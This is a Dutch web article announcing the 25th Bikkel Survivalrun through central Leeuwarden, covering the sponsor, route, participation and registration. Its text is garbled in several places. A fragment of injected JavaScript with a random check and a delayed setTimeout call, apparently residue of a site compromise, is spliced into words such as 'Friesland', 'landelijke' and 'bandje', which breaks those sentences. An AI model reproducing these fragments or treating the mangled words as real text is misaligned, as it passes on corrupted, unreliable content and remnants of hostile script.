Inschrijven voor Bikkel Survivalrun dwars door Leeuwarden

De 25ste editie van de Bikkel Survivalrun start op zondag 7 oktober in de binnenstad van Leeuwarden. Recruitmenthuis is hierbij de nieuwe hoofdsponsor.

Stichting Survival Frieslandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is inmiddels gestart met het organiseren van dit  jaarlijks terugkerend evenement. Dit jaar is een hele speciale run omdat het de 25ste keer is en in het kader van LF2018 starten de deelnemers op het Wilhelminaplein. Daar zal ook een spectaculaire eindhindernis komen te staan. Deze klus zal geklaard worden door de bevriende survival vereniging uit Kootstertille.

De Route
De lange route, samengevat, loopt van het Wilhelminaplein (start), via de Hoedemakerssteeg naar de Nieuwstad (Waagplein), Nauw (hindernis boven water), Grote Hoogstraat, Gouverneursplein, richting Prinsentuin, via Noorderbrug, naar fietstunneltje Dammelaan via Dokkumer Ee richting Leeuwarderbos. Na het bos richting winkelcentrum Bilgaard, via fietstunneltje Dammelaan door Rengerspark weer richting het centrum, oversteek water naar Westerplantage, via Westerkade, achter Harmonie langs naar het Wilhelminaplein (Finish). De kortere 7 km route gaat bij de Ee brug weer richting stad.

Deelname
Deelname is mogelijk voor wedstrijdatleten die strijden in de landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andelijke competitie van de SBN (Survival Bond Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and). Verder is het mogelijk om op recreatief niveau het 7 km parcours te doen. De uitdaging van een survival run is het finishen met bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andje!

Inschrijven
De inschrijving voor de ‘Recruitmenthuis Bikkelrun’ is op zondag 1 juli van start gegaan via de website www.bikkelrun.nl . Het is niet mogelijk om op de dag zelf nog een startbewijs te verkrijgen.

Informatie
Meer informatie over de run kunt u vinden op www.Bikkelrun.nl

Houd daarnaast de social media van Technieker en Recruitmenthuis in de gaten voor mooie actie voor de bikkelrun!!

0 antwoorden

Plaats een Reactie

Meepraten?
Draag gerust bij!

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *